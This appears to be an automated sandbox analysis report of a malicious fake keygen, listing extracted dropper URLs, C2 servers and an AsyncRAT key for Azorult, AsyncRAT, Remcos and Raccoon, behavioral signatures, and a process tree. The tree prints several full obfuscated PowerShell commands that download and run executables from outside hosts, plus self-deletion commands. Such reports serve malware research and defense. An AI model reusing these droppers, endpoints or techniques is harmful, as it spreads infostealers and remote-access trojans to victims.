Resubmissions

12-11-2021 18:04

211112-wnzb8aahhm 10

19-11-2020 10:08

201119-rhwlt38jrx 10

18-11-2020 17:26

201118-htd4fq29va 10

Analysis

  • max time kernel
    1806s
  • max time network
    1816s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    19-11-2020 10:08

General

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Family

raccoon

Botnet

5e4db353b88c002ba6466c06437973619aad03b3

Attributes
  • url4cnc

    https://telete.in/brikitiki

rc4.plain
rc4.plain

Extracted

Family

azorult

C2

http://195.245.112.115/index.php

Extracted

Family

asyncrat

Version

0.5.7B

C2

agentttt.ac.ug:6970

agentpurple.ac.ug:6970

Attributes
  • aes_key

    16dw6EDbQkYZp5BTs7cmLUicVtOA4UQr

  • anti_detection

    false

  • autorun

    false

  • bdos

    false

  • delay

    Default

  • host

    agentttt.ac.ug,agentpurple.ac.ug

  • hwid

    3

  • install_file

  • install_folder

    %AppData%

  • mutex

    AsyncMutex_6SI8OkPnk

  • pastebin_config

    null

  • port

    6970

  • version

    0.5.7B

aes.plain

Extracted

Family

remcos

C2

taenaia.ac.ug:6969

agentpapple.ac.ug:6969

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • BetaBot

    Beta Bot is a Trojan that infects computers and disables Antivirus.

  • Contains code to disable Windows Defender ⋅ 10 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings ⋅ 3 TTPs
  • Modifies firewall policy service ⋅ 2 TTPs 8 IoCs
  • Modifies security service ⋅ 2 TTPs 1 IoCs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • UAC bypass ⋅ 3 TTPs
  • Async RAT payload ⋅ 3 IoCs
  • ModiLoader First Stage ⋅ 2 IoCs
  • Blocklisted process makes network request ⋅ 6 IoCs
  • Disables taskbar notifications via registry modification
  • Disables use of System Restore points ⋅ 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory ⋅ 1 IoCs
  • Executes dropped EXE ⋅ 50 IoCs
  • Sets file execution options in registry ⋅ 2 TTPs
  • Sets service image path in registry ⋅ 2 TTPs
  • Checks BIOS information in registry ⋅ 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL ⋅ 22 IoCs
  • Reads user/profile data of local email clients ⋅ 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers ⋅ 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification ⋅ 2 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting ⋅ 2 TTPs
  • Adds Run key to start application ⋅ 2 TTPs 13 IoCs
  • Checks for any installed AV software in registry ⋅ 1 TTPs 2 IoCs
  • Checks installed software on the system ⋅ 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled ⋅ 1 TTPs 15 IoCs
  • Drops desktop.ini file(s) ⋅ 3 IoCs
  • Maps connected drives based on registry ⋅ 3 TTPs 32 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Suspicious use of NtSetInformationThreadHideFromDebugger ⋅ 64 IoCs
  • Suspicious use of SetThreadContext ⋅ 19 IoCs
  • Enumerates physical storage devices ⋅ 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry ⋅ 2 TTPs 9 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe ⋅ 8 IoCs
  • Enumerates system info in registry ⋅ 2 TTPs 2 IoCs
  • Kills process with taskkill ⋅ 5 IoCs
  • Modifies Internet Explorer Protected Mode ⋅ 1 TTPs 4 IoCs
  • Modifies Internet Explorer Protected Mode Banner ⋅ 1 TTPs 1 IoCs
  • Modifies Internet Explorer settings ⋅ 1 TTPs 5 IoCs
  • Modifies registry class ⋅ 1 IoCs
  • Modifies registry key ⋅ 1 TTPs 3 IoCs
  • Modifies system certificate store ⋅ 2 TTPs 2 IoCs
  • NTFS ADS ⋅ 2 IoCs
  • Runs regedit.exe ⋅ 1 IoCs
  • Suspicious behavior: EnumeratesProcesses ⋅ 64 IoCs
  • Suspicious behavior: MapViewOfSection ⋅ 31 IoCs
  • Suspicious use of AdjustPrivilegeToken ⋅ 64 IoCs
  • Suspicious use of SetWindowsHookEx ⋅ 13 IoCs
  • Suspicious use of WriteProcessMemory ⋅ 64 IoCs
  • Views/modifies file attributes ⋅ 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\amtemu.v0.9.2.win-painter_edited.exe
    "C:\Users\Admin\AppData\Local\Temp\amtemu.v0.9.2.win-painter_edited.exe"
    Suspicious use of WriteProcessMemory
    PID:4716
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6D65.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\amtemu.v0.9.2.win-painter_edited.exe"
      Checks whether UAC is enabled
      Maps connected drives based on registry
      Suspicious use of WriteProcessMemory
      PID:1008
      • C:\Users\Admin\AppData\Local\Temp\6D65.tmp\key.exe
        key.exe
        Executes dropped EXE
        Checks whether UAC is enabled
        Maps connected drives based on registry
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of WriteProcessMemory
        PID:3604
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\t4402.bat" "C:\Users\Admin\AppData\Local\Temp\6D65.tmp\key.exe" "
          Drops file in Drivers directory
          Checks whether UAC is enabled
          Maps connected drives based on registry
          Suspicious use of NtSetInformationThreadHideFromDebugger
          Suspicious use of WriteProcessMemory
          PID:4172
          • C:\Windows\SysWOW64\attrib.exe
            attrib +h C:\Users\Admin\AppData\Local\Temp\ytmp
            Views/modifies file attributes
            PID:4072
          • C:\Windows\SysWOW64\find.exe
            FIND /C /I "0.0.0.0 cracksmind.com" C:\Windows\system32\drivers\etc\hosts
            PID:3176
          • C:\Windows\SysWOW64\find.exe
            FIND /C /I "0.0.0.0 www.cracksmind.com" C:\Windows\system32\drivers\etc\hosts
            PID:4084
          • C:\Users\Admin\AppData\Local\Temp\afolder\data.dat
            C:\Users\Admin\AppData\Local\Temp\afolder/data.dat
            Executes dropped EXE
            Loads dropped DLL
            Adds Run key to start application
            Checks whether UAC is enabled
            Maps connected drives based on registry
            Suspicious use of NtSetInformationThreadHideFromDebugger
            Suspicious behavior: EnumeratesProcesses
            Suspicious use of SetWindowsHookEx
            PID:3140
      • C:\Windows\SysWOW64\timeout.exe
        TIMEOUT /T 1
        Delays execution with timeout.exe
        PID:2776
      • C:\Users\Admin\AppData\Local\Temp\6D65.tmp\Microsoft.VisualStudio.Package.LanguageService.11.0.exe
        Microsoft.VisualStudio.Package.LanguageService.11.0.exe
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        PID:3212
        • C:\Windows\SysWOW64\Wbem\wmic.exe
          "wmic" os get Caption /format:list
          Suspicious use of AdjustPrivilegeToken
          PID:3948
      • C:\Windows\SysWOW64\timeout.exe
        TIMEOUT /T 2
        Delays execution with timeout.exe
        PID:3460
      • C:\Users\Admin\AppData\Local\Temp\6D65.tmp\bb.exe
        bb.exe
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        PID:4472
        • C:\Users\Admin\AppData\Local\Temp\6D65.tmp\bb.exe
          "C:\Users\Admin\AppData\Local\Temp\6D65.tmp\bb.exe"
          Executes dropped EXE
          Checks whether UAC is enabled
          Suspicious use of NtSetInformationThreadHideFromDebugger
          Checks processor information in registry
          Suspicious behavior: MapViewOfSection
          Suspicious use of AdjustPrivilegeToken
          Suspicious use of WriteProcessMemory
          PID:652
          • C:\Windows\SysWOW64\explorer.exe
            C:\Windows\SysWOW64\explorer.exe
            Modifies firewall policy service
            Checks BIOS information in registry
            Adds Run key to start application
            Drops desktop.ini file(s)
            Suspicious use of NtSetInformationThreadHideFromDebugger
            Checks processor information in registry
            Enumerates system info in registry
            Modifies Internet Explorer Protected Mode
            Modifies Internet Explorer Protected Mode Banner
            Modifies Internet Explorer settings
            NTFS ADS
            Suspicious behavior: EnumeratesProcesses
            Suspicious behavior: MapViewOfSection
            Suspicious use of AdjustPrivilegeToken
            Suspicious use of WriteProcessMemory
            PID:1288
            • C:\Users\Admin\AppData\Local\Temp\9119gy3q5_1.exe
              /suac
              Executes dropped EXE
              Suspicious use of SetThreadContext
              PID:4428
              • C:\Users\Admin\AppData\Local\Temp\9119gy3q5_1.exe
                "C:\Users\Admin\AppData\Local\Temp\9119gy3q5_1.exe"
                Modifies firewall policy service
                Executes dropped EXE
                Checks for any installed AV software in registry
                Checks whether UAC is enabled
                Suspicious use of NtSetInformationThreadHideFromDebugger
                Checks processor information in registry
                Suspicious behavior: MapViewOfSection
                PID:4468
                • C:\Windows\SysWOW64\regedit.exe
                  "C:\Windows\SysWOW64\regedit.exe"
                  Modifies security service
                  Adds Run key to start application
                  Modifies Internet Explorer settings
                  Runs regedit.exe
                  PID:4804
            • C:\Users\Admin\AppData\Local\Temp\i533usso357o795.exe
              "C:\Users\Admin\AppData\Local\Temp\i533usso357o795.exe"
              Executes dropped EXE
              Checks whether UAC is enabled
              Maps connected drives based on registry
              Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:4572
            • C:\Users\Admin\AppData\Local\Temp\333u357995k.exe
              "C:\Users\Admin\AppData\Local\Temp\333u357995k.exe"
              Executes dropped EXE
              Checks whether UAC is enabled
              Maps connected drives based on registry
              Suspicious use of SetThreadContext
              Suspicious behavior: MapViewOfSection
              Suspicious use of SetWindowsHookEx
              PID:5252
              • C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
                "C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
                Executes dropped EXE
                Suspicious use of SetThreadContext
                Suspicious behavior: MapViewOfSection
                Suspicious use of SetWindowsHookEx
                PID:5888
                • C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
                  "C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
                  Executes dropped EXE
                  PID:4624
              • C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe
                "C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"
                Executes dropped EXE
                Suspicious use of SetThreadContext
                Suspicious behavior: MapViewOfSection
                Suspicious use of SetWindowsHookEx
                PID:5404
                • C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe
                  "C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"
                  Executes dropped EXE
                  Loads dropped DLL
                  Checks processor information in registry
                  PID:5284
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c taskkill /pid 5284 & erase C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe & RD /S /Q C:\\ProgramData\\778415280088976\\* & exit
                    PID:4788
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 5284
                      Kills process with taskkill
                      PID:5552
              • C:\Users\Admin\AppData\Local\Temp\333u357995k.exe
                "C:\Users\Admin\AppData\Local\Temp\333u357995k.exe"
                Executes dropped EXE
                PID:3960
      • C:\Windows\SysWOW64\timeout.exe
        TIMEOUT /T 3
        Delays execution with timeout.exe
        PID:980
      • C:\Users\Admin\AppData\Local\Temp\6D65.tmp\puttty.exe
        puttty.exe
        Executes dropped EXE
        Checks whether UAC is enabled
        Maps connected drives based on registry
        Suspicious use of NtSetInformationThreadHideFromDebugger
        PID:1780
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
          dw20.exe -x -s 1532
          Maps connected drives based on registry
          Suspicious use of NtSetInformationThreadHideFromDebugger
          Suspicious behavior: EnumeratesProcesses
          PID:1428
      • C:\Windows\SysWOW64\timeout.exe
        TIMEOUT /T 4
        Delays execution with timeout.exe
        PID:1948
      • C:\Users\Admin\AppData\Local\Temp\6D65.tmp\ereds.exe
        ereds.exe
        Executes dropped EXE
        PID:928
        • C:\Users\Admin\AppData\Local\Temp\keygen.exe
          "C:\Users\Admin\AppData\Local\Temp\keygen.exe"
          PID:4724
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B1F0.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\keygen.exe"
            Checks whether UAC is enabled
            Maps connected drives based on registry
            Suspicious use of NtSetInformationThreadHideFromDebugger
            Modifies registry class
            PID:5044
            • C:\Users\Admin\AppData\Local\Temp\B1F0.tmp\Keygen.exe
              Keygen.exe
              Executes dropped EXE
              Checks whether UAC is enabled
              Maps connected drives based on registry
              Suspicious use of NtSetInformationThreadHideFromDebugger
              Suspicious use of SetWindowsHookEx
              PID:3684
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B1F0.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
              Checks whether UAC is enabled
              PID:4020
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                Blocklisted process makes network request
                Maps connected drives based on registry
                Suspicious use of NtSetInformationThreadHideFromDebugger
                Suspicious behavior: EnumeratesProcesses
                PID:4464
                • C:\Users\Public\abx.exe
                  "C:\Users\Public\abx.exe"
                  Executes dropped EXE
                  Suspicious use of SetWindowsHookEx
                  PID:2012
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B1F0.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
              Checks whether UAC is enabled
              Maps connected drives based on registry
              PID:4300
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                Maps connected drives based on registry
                Suspicious use of NtSetInformationThreadHideFromDebugger
                Suspicious behavior: EnumeratesProcesses
                PID:556
            • C:\Windows\SysWOW64\timeout.exe
              timeout 1
              Delays execution with timeout.exe
              PID:4092
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B1F0.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
              PID:2532
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                Blocklisted process makes network request
                Suspicious behavior: EnumeratesProcesses
                PID:5112
                • C:\Users\Public\nqu.exe
                  "C:\Users\Public\nqu.exe"
                  Executes dropped EXE
                  Checks whether UAC is enabled
                  Maps connected drives based on registry
                  Suspicious use of NtSetInformationThreadHideFromDebugger
                  Suspicious use of SetThreadContext
                  PID:720
                  • C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe
                    "C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe"
                    Executes dropped EXE
                    Suspicious use of SetThreadContext
                    PID:5300
                    • C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe
                      "C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe"
                      Executes dropped EXE
                      Suspicious use of SetThreadContext
                      PID:3620
                      • C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe
                        "{path}"
                        Executes dropped EXE
                        Loads dropped DLL
                        Checks processor information in registry
                        PID:1336
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c taskkill /pid 1336 & erase C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe & RD /S /Q C:\\ProgramData\\337278076516208\\* & exit
                          PID:6636
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /pid 1336
                            Kills process with taskkill
                            PID:2936
                    • C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe
                      "{path}"
                      Executes dropped EXE
                      PID:1404
                  • C:\Users\Public\nqu.exe
                    "{path}"
                    Executes dropped EXE
                    PID:5472
                  • C:\Users\Public\nqu.exe
                    "{path}"
                    Executes dropped EXE
                    Loads dropped DLL
                    Drops desktop.ini file(s)
                    PID:5052
                    • C:\Users\Admin\AppData\Local\Temp\RxfEjqsctc.exe
                      "C:\Users\Admin\AppData\Local\Temp\RxfEjqsctc.exe"
                      Executes dropped EXE
                      Suspicious use of SetThreadContext
                      PID:5484
                      • C:\Users\Admin\AppData\Local\Temp\RxfEjqsctc.exe
                        "C:\Users\Admin\AppData\Local\Temp\RxfEjqsctc.exe"
                        Executes dropped EXE
                        PID:5456
                      • C:\Users\Admin\AppData\Local\Temp\RxfEjqsctc.exe
                        "C:\Users\Admin\AppData\Local\Temp\RxfEjqsctc.exe"
                        Executes dropped EXE
                        PID:1928
                    • C:\Users\Admin\AppData\Local\Temp\QufVBH3jUE.exe
                      "C:\Users\Admin\AppData\Local\Temp\QufVBH3jUE.exe"
                      Executes dropped EXE
                      Suspicious use of SetThreadContext
                      PID:4828
                      • C:\Program Files (x86)\internet explorer\ieinstal.exe
                        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                        PID:7132
                    • C:\Users\Admin\AppData\Local\Temp\fYDz9wNnYe.exe
                      "C:\Users\Admin\AppData\Local\Temp\fYDz9wNnYe.exe"
                      Executes dropped EXE
                      Suspicious use of SetThreadContext
                      PID:5512
                      • C:\Users\Admin\AppData\Local\Temp\fYDz9wNnYe.exe
                        "C:\Users\Admin\AppData\Local\Temp\fYDz9wNnYe.exe"
                        Executes dropped EXE
                        Suspicious use of SetWindowsHookEx
                        PID:5660
                        • \??\c:\windows\SysWOW64\cmstp.exe
                          "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\kibbhhvr.inf
                          PID:748
                    • C:\Users\Admin\AppData\Local\Temp\a0k7SvAzhM.exe
                      "C:\Users\Admin\AppData\Local\Temp\a0k7SvAzhM.exe"
                      Executes dropped EXE
                      Suspicious use of SetThreadContext
                      PID:3876
                      • C:\Users\Admin\AppData\Local\Temp\a0k7SvAzhM.exe
                        "C:\Users\Admin\AppData\Local\Temp\a0k7SvAzhM.exe"
                        Executes dropped EXE
                        Windows security modification
                        PID:5852
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "powershell" Get-MpPreference -verbose
                          PID:2156
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\nqu.exe"
                      PID:4852
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout /T 10 /NOBREAK
                        Delays execution with timeout.exe
                        PID:6028
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B1F0.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
              PID:4868
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                Suspicious behavior: EnumeratesProcesses
                PID:3272
            • C:\Windows\SysWOW64\timeout.exe
              timeout 2
              Delays execution with timeout.exe
              PID:196
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B1F0.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
              PID:4960
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                Blocklisted process makes network request
                Suspicious behavior: EnumeratesProcesses
                PID:4412
